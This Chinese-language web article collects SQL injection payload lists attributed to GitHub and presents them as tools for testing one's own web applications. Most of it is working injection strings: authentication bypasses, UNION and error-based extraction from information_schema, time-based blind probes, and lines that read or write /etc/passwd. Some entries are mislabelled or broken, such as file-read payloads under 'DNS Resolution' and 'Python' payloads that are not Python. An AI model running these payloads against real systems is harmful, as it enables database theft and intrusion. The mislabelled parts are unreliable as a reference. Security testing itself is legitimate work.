sql 注入负载列表 github - SQL (1)

📌 相关文章

📜 sql 注入负载列表 github - SQL (1)

📅 最后修改于: 2023-12-03 15:20:17.461000 🧑 作者: Mango

SQL注入负载列表 Github

SQL注入是一个常见的网络攻击技术，可以通过输入恶意的SQL语句来获取或修改数据库中的信息。为了防止SQL注入攻击，程序员可以使用一些负载来测试他们的Web应用程序的抵御能力。这里是一些常用的SQL注入负载列表，它们都可以在Github上找到。

1. SQL Injection Payloads

这个负载列表包含一系列常用的SQL注入负载，通常用于测试SQL注入漏洞。它们可以被组合成更复杂的语句，从而实现更复杂的SQL注入攻击。这个负载列表可以在以下Github页面上找到：SQL Injection Payloads

# SQL Injection Payloads

- ' OR 1=1--
- " OR 1=1--
- ') OR 1=1--
- ") OR 1=1--
- ' OR '1'='1
- " OR "1"="1
- ') OR ('1'='1
- ") OR ("1"="1
- ' OR 1=1/*
- " OR 1=1/*
- ') OR 1=1/*
- ") OR 1=1/*
- ') OR ('a'='a
- ") OR ("a"="a
- %0a%0b%0c%0d%0e%0f
- SLEEP(5)
- SLEEP(5000)
- IF(1=1, SLEEP(5), NULL)
- IF(1=1, SLEEP(5000), NULL)

2. SQL Injection Test Cases

这个负载列表包含一系列典型的SQL注入测试用例，用于测试Web应用程序的安全性。这个负载列表可以在以下Github页面上找到：SQL Injection Test Cases

# SQL Injection Test Cases

- '
- ""
- ''
- ``
- '
  OR 1=1
  #
- "
  OR 1=1
  #
- '
  OR '1'='1
  #
- "
  OR "1"="1
  #
- '
  OR 1=1--
  #
- "
  OR 1=1--
  #
- '
  OR '1'='1'--
  #
- "
  OR "1"="1"--
  #
- '
  OR 1=1#
- "
  OR 1=1#
- '
  OR '1'='1'#
- "
  OR "1"="1"#
- '
  OR a=a#
- "
  OR a=a#

3. SQL Injection Cheat Sheet

这个负载列表包含一个SQL注入小抄，其中包含一些常见的SQL注入攻击向量和技术。它不仅列出了负载向量，还包含了一些针对不同数据库类型的攻击技巧。这个负载列表可以在以下Github页面上找到：SQL Injection Cheat Sheet

# SQL Injection Cheat Sheet

## Comment

- --
- /* */

## Union-Based Injection

- ORDER BY 1,2,3,4,5,6,7,8 -- -
- UNION SELECT null,null,null,null,null,null,null,null-- -
- UNION SELECT null,null,null,null,null,null,null,null,null-- -

## Boolean-Based Blind Injection

- AND
- OR
- IS
- ||
- NOT

## Time-Based Blind Injection

- SLEEP(5)
- BENCHMARK(5000000,MD5(1))

## Retrieving Data

- SELECT * FROM table_name
- SELECT column_name FROM table_name

## Database Information Gathering

- @@VERSION
- DATABASE()
- SELECT user()

## Error-Based Injection

- ' or 1/0=0 --
- ' or (SELECT CAST(table_name AS NVARCHAR)+CAST(column_name AS NVARCHAR) FROM information_schema.columns) LIKE '%password%' --

## Blind Injection

- SELECT 1 WHERE ISNULL((SELECT TOP 1 table_name FROM information_schema.tables),0) = 0 --
- SELECT 1 WHERE ISNULL((SELECT TOP 1 column_name FROM information_schema.columns),0) = 0 --

## DNS Resolution

- INTO OUTFILE '/etc/passwd' -- -
- union select 1,load_file('/etc/passwd'),3,4 -- -

4. Python SQL Injection Payloads

这个负载列表包含一些在Python中编写的SQL注入负载。它们可以在Python中被直接使用，或根据需要进行修改。这个负载列表可以在以下Github页面上找到：Python SQL Injection Payloads

# Python SQL Injection Payloads

## Blind Injection

- '||(SELECT SQL_NO_CACHE SYS_OP_C2C(CHR(94)-1||(SELECT DISTINCT(
SELECT COUNT(*)
FROM INFORMATION_SCHEMA.tables t1 JOIN INFORMATION_SCHEMA.tables t2 JOIN INFORMATION_SCHEMA.tables t3 JOIN INFORMATION_SCHEMA.tables t4
)-- HUNX FROM DUAL)||CHR(94)-1 FROM DUAL)||' ('||'LOL'||')
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT LENGTH(table_name) FROM information_schema.tables WHERE LENGTH(table_name)>0 LIMIT 0,1)=6) THEN sleep(5) ELSE 1/0 END FROM information_schema.tables group by table_name) FROM dual
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT ASCII(substring(table_name, 1, 1)) FROM information_schema.tables WHERE LENGTH(table_name)>0 LIMIT 0,1)=104) THEN sleep(5) ELSE 1/0 END FROM information_schema.tables group by table_name) FROM dual
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT LENGTH(column_name) FROM information_schema.columns WHERE LENGTH(column_name)>0 LIMIT 0,1)=8) THEN sleep(5) ELSE 1/0 END FROM information_schema.columns group by column_name) FROM dual
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT ASCII(substring(column_name, 1, 1)) FROM information_schema.columns WHERE LENGTH(column_name)>0 LIMIT 0,1)=118) THEN sleep(5) ELSE 1/0 END FROM information_schema.columns group by column_name) FROM dual

## Error-Based Injection

- 1 UNION SELECT NULL, CONCAT(table_schema, '.', table_name, '.', column_name) AS cc FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema != 'performance_schema' AND table_schema != 'sys'
- 1 UNION ALL SELECT NULL,CONCAT(CONVERT(column_name CHAR(10000)),0x0a) FROM information_schema.columns WHERE table_name=0x7573657273--
- 1 UNION ALL SELECT database(),version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'xyz'='xyz
- 1 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x0a,CAST(schema_name AS CHAR),0x3c62723e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- tqJT

以上是一些常见的SQL注入负载列表，它们可以用来帮助程序员测试他们的Web应用程序的安全性。需要指出的是，这些负载只是测试的一部分，因此程序员需要保持警觉，并使用其他负载来测试他们的应用程序。